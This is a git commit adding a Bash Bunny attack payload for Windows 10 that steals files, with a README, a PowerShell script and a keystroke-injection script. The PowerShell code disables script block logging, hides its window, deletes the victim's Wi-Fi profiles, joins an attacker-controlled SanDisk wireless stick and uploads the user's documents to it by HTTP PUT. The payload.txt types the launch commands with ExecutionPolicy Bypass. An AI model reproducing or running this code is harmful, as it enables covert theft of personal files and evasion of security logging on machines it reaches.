SanDisk Wireless Stick Exfiltration (#445)
Uses the "SanDisk Wireless Stick" for files exfiltration. 1) Avoids "PowerShell Script Block Logging". 2) Hide "PowerShell" window. 3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection. 4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode. 5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again. 6) Exfiltration of the files via the HTTP channel.pull/482/head
parent
49f7018bf3
commit
5d4367787f
|
@ -0,0 +1,40 @@
|
|||
# Files Exfiltration with "SanDisk Wireless Stick"
|
||||
|
||||
- Title: "SanDisk Wireless Stick" Exfiltration
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Microsoft Windows 10
|
||||
- Category: Exfiltration
|
||||
|
||||
## Description
|
||||
|
||||
Uses the "SanDisk Wireless Stick" for files exfiltration.
|
||||
1) Avoids "PowerShell Script Block Logging".
|
||||
2) Hide "PowerShell" window.
|
||||
3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
|
||||
4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
|
||||
5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again.
|
||||
6) Exfiltration of the files via the HTTP channel.
|
||||
|
||||
## Configuration
|
||||
|
||||
In the web interface of the "SanDisk Wireless Stick" after update, change the following values :
|
||||
|
||||
![SanDisk-Configuration.png](./assets/SanDisk-Configuration.png)
|
||||
|
||||
From "payload.txt" change the values of the following constants :
|
||||
```bash
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
readonly SANDISK_SSID="HAK5-EXFIL"
|
||||
readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
|
||||
readonly SANDISK_LOOT="loots"
|
||||
readonly USER_DIRECTORY="~\\"
|
||||
readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
|
||||
|
||||
```
|
||||
|
||||
## Link
|
||||
[SanDisk Vendor](https://www.sandisk.com/goto/connect)
|
Binary file not shown.
After Width: | Height: | Size: 22 KiB |
|
@ -0,0 +1,159 @@
|
|||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
#
|
||||
|
||||
param (
|
||||
[string] $SSID,
|
||||
[string] $PSK,
|
||||
[string] $LOOT,
|
||||
[string] $DIRECTORY,
|
||||
[string] $EXTENSION
|
||||
)
|
||||
|
||||
# Avoids "PowerShell Script Block Logging".
|
||||
#
|
||||
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
|
||||
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
|
||||
$etw_provider.SetValue($null, $event_provider)
|
||||
|
||||
# Hide "PowerShell" window.
|
||||
#
|
||||
$Script:showWindowAsync = Add-Type -MemberDefinition @"
|
||||
[DllImport("user32.dll")]
|
||||
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
|
||||
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
|
||||
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
|
||||
|
||||
If ($SSID -And $PSK -And $LOOT -And $DIRECTORY -And $EXTENSION) {
|
||||
|
||||
# Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
|
||||
#
|
||||
$interface_guid = (Get-NetAdapter -Physical -Name "Wi-Fi" | WHERE Status -eq "Up").InterfaceGuid
|
||||
If ($interface_guid) {
|
||||
$wlan_service_path = "C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\${interface_guid}\"
|
||||
$wlan_service_items = Get-ChildItem -Path $wlan_service_path -Recurse
|
||||
$wlan_service_items | ForEach-Object {
|
||||
[xml] $xml_content = Get-Content -Path $_.FullName
|
||||
$mode = $xml_content.WLANProfile.connectionMode
|
||||
$name = $xml_content.WLANProfile.name
|
||||
If ($mode -eq "auto") {
|
||||
(NETSH WLAN DELETE PROFILE name="$name") | Out-Null
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
# Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
|
||||
#
|
||||
$profile_guid = "{" + [guid]::NewGuid().ToString() + "}"
|
||||
$profile_path = "${env:TEMP}\${profile_guid}.xml"
|
||||
$ssid_hex = ($SSID.ToCharArray() | ForEach-Object { [System.String]::Format("{0:X}", [System.Convert]::ToUInt32($_)) })
|
||||
@"
|
||||
<?xml version="1.0"?>
|
||||
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
|
||||
<name>${SSID}</name>
|
||||
<SSIDConfig>
|
||||
<SSID>
|
||||
<hex>${ssid_hex}</hex>
|
||||
<name>${SSID}</name>
|
||||
</SSID>
|
||||
</SSIDConfig>
|
||||
<connectionType>ESS</connectionType>
|
||||
<connectionMode>auto</connectionMode>
|
||||
<MSM>
|
||||
<security>
|
||||
<authEncryption>
|
||||
<authentication>WPA2PSK</authentication>
|
||||
<encryption>AES</encryption>
|
||||
<useOneX>false</useOneX>
|
||||
</authEncryption>
|
||||
<sharedKey>
|
||||
<keyType>passPhrase</keyType>
|
||||
<protected>false</protected>
|
||||
<keyMaterial>${PSK}</keyMaterial>
|
||||
</sharedKey>
|
||||
</security>
|
||||
</MSM>
|
||||
<MacRandomization xmlns="http://www.microsoft.com/networking/WLAN/profile/v3">
|
||||
<enableRandomization>false</enableRandomization>
|
||||
</MacRandomization>
|
||||
</WLANProfile>
|
||||
"@ | Out-File -FilePath "${profile_path}"
|
||||
|
||||
(NETSH WLAN ADD PROFILE filename="${profile_path}") | Out-Null
|
||||
Remove-Item -Path "${profile_path}" -Force
|
||||
|
||||
# Checks whether the Wi-Fi interface is connected to the "SanDisk".
|
||||
# Whether the gateway can be reached.
|
||||
# If not, automatically starts again.
|
||||
#
|
||||
While ($TRUE) {
|
||||
$ConnectionError = $NULL
|
||||
Try {
|
||||
(NETSH WLAN CONNECT name="$SSID") | Out-Null
|
||||
$wifi_connected = (Get-NetConnectionProfile).Name
|
||||
$gateway_address = (Get-NetRoute -DestinationPrefix 0.0.0.0/0 | Select-Object -ExpandProperty NextHop)
|
||||
$gateway_reachable = (Test-Connection -ComputerName $gateway_address -Quiet)
|
||||
If ($wifi_connected -eq $SSID -And $gateway_reachable) {
|
||||
Break
|
||||
}
|
||||
} Catch {
|
||||
$ConnectionError = $_
|
||||
Start-Sleep -Seconds 8
|
||||
}
|
||||
}
|
||||
|
||||
#
|
||||
# Exfiltration of the files via the HTTP channel.
|
||||
#
|
||||
|
||||
Function Invoke-CustomRequest($Url, $Method) {
|
||||
$RequestError = $NULL
|
||||
Try {
|
||||
$request = [System.Net.WebRequest]::Create($Url)
|
||||
$request.Method = $Method
|
||||
$request.GetResponse().Close()
|
||||
} Catch {
|
||||
$RequestError = $_
|
||||
return $FALSE
|
||||
}
|
||||
return $TRUE
|
||||
}
|
||||
|
||||
Function Invoke-UploadRequest($Url, $File) {
|
||||
$RestError = $NULL
|
||||
Try {
|
||||
$empty = [String]::IsNullOrWhiteSpace((Get-Content -Path $File))
|
||||
If (!$empty) {
|
||||
Invoke-RestMethod -Uri $Url -Method PUT -InFile $File
|
||||
}
|
||||
} Catch {
|
||||
$RestError = $_
|
||||
}
|
||||
}
|
||||
|
||||
Function Exfiltration-Files($Directory, $Extension, $Url) {
|
||||
$files = Get-ChildItem -Path $Directory -Include ($Extension.split(",")) -Recurse
|
||||
ForEach ($file in $files) {
|
||||
$random = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_} ) )
|
||||
$basename = Split-Path -Path "${file}" -Leaf -Resolve
|
||||
Invoke-UploadRequest -Url "${Url}${random}-${basename}" -File "${file}" | Out-Null
|
||||
}
|
||||
}
|
||||
|
||||
$sandisk_loot = "http://${gateway_address}/myconnect/${LOOT}/"
|
||||
|
||||
$check_loot = Invoke-CustomRequest -Url $sandisk_loot -Method "GET"
|
||||
If ($check_loot) {
|
||||
Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
|
||||
} Else {
|
||||
Invoke-CustomRequest -Url $sandisk_loot -Method "MKCOL" | Out-Null
|
||||
Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
|
||||
}
|
||||
|
||||
# Cleanup
|
||||
#
|
||||
(NETSH WLAN DELETE PROFILE name="$SSID") | Out-Null
|
||||
Exit
|
||||
|
||||
}
|
|
@ -0,0 +1,74 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: SanDisk Wireless Stick Exfiltration
|
||||
#
|
||||
# Description: Files Exfiltration with "SanDisk Wireless Stick"
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Exfiltration
|
||||
# Target: Microsoft Windows 10
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1)
|
||||
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||
#
|
||||
# REQUIREMENTS
|
||||
# ===============
|
||||
# SanDisk Wireless Stick 16Go/32Go - Firmware 4.1.0 (2050)
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
#
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
readonly SANDISK_SSID="HAK5-EXFIL"
|
||||
readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
|
||||
readonly SANDISK_LOOT="loots"
|
||||
readonly USER_DIRECTORY="~\\"
|
||||
readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
|
||||
Q DELAY 5000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
Q STRING "CD \"\${BB_VOLUME}\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
Q STRING ".\payload.ps1 -SSID \"${SANDISK_SSID}\" -PSK \"${SANDISK_PSK}\" -LOOT \"${SANDISK_LOOT}\" -DIRECTORY \"${USER_DIRECTORY}\" -EXTENSION \"${FILE_EXTENSION}\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
shutdown -h 0
|
Loading…
Reference in New Issue